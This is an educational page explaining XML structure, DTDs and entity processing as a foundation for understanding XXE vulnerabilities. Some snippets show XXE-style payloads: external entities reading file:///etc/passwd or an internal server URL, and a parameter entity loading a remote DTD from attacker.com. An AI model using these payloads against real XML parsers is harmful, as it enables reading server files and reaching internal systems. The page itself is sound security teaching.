Skip to content
🔵Info

XML & DTD Basics

Understanding XML structure, Document Type Definitions (DTDs), and entity processing - the foundation for comprehending XXE vulnerabilities.

Overview

XML (eXtensible Markup Language) is a markup language that defines rules for encoding documents in a format that is both human-readable and machine-readable. To understand XXE vulnerabilities, you must first understand how XML parsers process entities and DTDs.

This guide covers the fundamental concepts of XML, DTDs, and entity processing that form the basis for understanding XXE attacks.

XML Document Structure

A basic XML document consists of elements with opening and closing tags, attributes, and content. Here's a simple example:

Simple XML Example

XML
1<?xml version="1.0" encoding="UTF-8"?>
2<catalog>
3  <book id="1">
4    <title>Security Engineering</title>
5    <author>Ross Anderson</author>
6    <price>59.99</price>
7  </book>
8  <book id="2">
9    <title>The Web Application Hacker's Handbook</title>
10    <author>Dafydd Stuttard</author>
11    <price>49.99</price>
12  </book>
13</catalog>

Document Type Definition (DTD)

A DTD defines the structure and legal elements of an XML document. DTDs can be declared inline (internal) or referenced from external files (external). DTDs are where XML entities are declared.

There are two types of DTDs:

Internal DTD: Declared within the XML document itself External DTD: Referenced from an external file or URL

Internal DTD Example

XML
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE note [
3  <!ELEMENT note (to,from,heading,body)>
4  <!ELEMENT to (#PCDATA)>
5  <!ELEMENT from (#PCDATA)>
6  <!ELEMENT heading (#PCDATA)>
7  <!ELEMENT body (#PCDATA)>
8]>
9<note>
10  <to>Security Team</to>
11  <from>Developer</from>
12  <heading>Reminder</heading>
13  <body>Disable external entities in production!</body>
14</note>

XML Entities

XML entities are a way to represent data within XML documents. There are several types of entities:

1. Character Entities: Represent special characters (e.g., &lt; for <) 2. General Entities: Custom entities defined in the DTD 3. Parameter Entities: Used within DTD definitions (prefixed with %) 4. External Entities: Reference content from external sources (the source of XXE vulnerabilities)

Entities are declared in the DTD and then referenced in the XML document using the &entityname; syntax.

General Entity Example

XML
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE message [
3  <!ENTITY company "ACME Corporation">
4  <!ENTITY email "security@acme.com">
5]>
6<message>
7  <from>&company;</from>
8  <contact>&email;</contact>
9  <text>This is a message from our company.</text>
10</message>

External Entities

External entities reference content from outside the XML document. This is where XXE vulnerabilities originate. When an XML parser processes an external entity, it retrieves the content from the specified location.

External entities use the SYSTEM keyword to specify the location:

External Entity Syntax

XML
1<!ENTITY entityname SYSTEM "URI">
2
3<!-- Examples -->
4<!ENTITY external SYSTEM "http://example.com/data.xml">
5<!ENTITY localfile SYSTEM "file:///etc/passwd">
6<!ENTITY network SYSTEM "http://internal-server/secret">

Parameter Entities

Parameter entities are special entities used within DTD declarations. They are defined and referenced with a percent sign (%). Parameter entities are particularly important in blind XXE attacks.

Syntax: <!ENTITY % name "value">

Parameter entities can only be used within the DTD, not in the XML document content.

Parameter Entity Example

XML
1<!ENTITY % system "Windows 10">
2<!ENTITY % version "21H2">
3<!ENTITY full "%system; %version;">
4
5<!-- Parameter entities can also reference external DTDs -->
6<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
7%remote;

Entity Expansion Process

When an XML parser encounters an entity reference, it expands (replaces) the reference with the entity's value. This process is called entity expansion.

For internal entities: The parser substitutes the predefined value For external entities: The parser:

  1. Retrieves content from the specified URI
  2. Parses the retrieved content
  3. Substitutes the entity reference with the content

This automatic retrieval and parsing of external content is what makes XXE attacks possible.

Entity Expansion Example

XML
1<!-- Entity Declaration -->
2<!ENTITY company "ACME Corp">
3
4<!-- Entity Reference in XML -->
5<name>&company;</name>
6
7<!-- After Entity Expansion -->
8<name>ACME Corp</name>
9
10<!-- External Entity Example -->
11<!ENTITY external SYSTEM "file:///etc/passwd">
12<data>&external;</data>
13
14<!-- Parser retrieves file content and expands -->
15<data>
16root:x:0:0:root:/root:/bin/bash
17daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
18...
19</data>

Security Implications

The ability for XML parsers to automatically retrieve and process external entities creates several security risks:

1. File Disclosure: Attackers can read arbitrary files from the server's filesystem 2. SSRF (Server-Side Request Forgery): Attackers can make the server send requests to internal systems 3. Denial of Service: Malicious entity definitions can cause excessive resource consumption 4. Remote Code Execution: In some configurations, attackers can execute arbitrary code

By default, most XML parsers have external entity processing enabled, making applications vulnerable unless developers explicitly disable it.

Key Takeaways

Understanding these fundamentals is essential for comprehending XXE vulnerabilities:

  • XML documents can include DTD declarations that define entities
  • External entities reference content from external URIs (files, URLs)
  • XML parsers automatically retrieve and expand external entities
  • This automatic behavior is often enabled by default
  • Parameter entities are used in DTDs and are key to blind XXE attacks
  • Entity expansion can access local files, network resources, and more

The next step is understanding how attackers exploit these features to perform XXE attacks.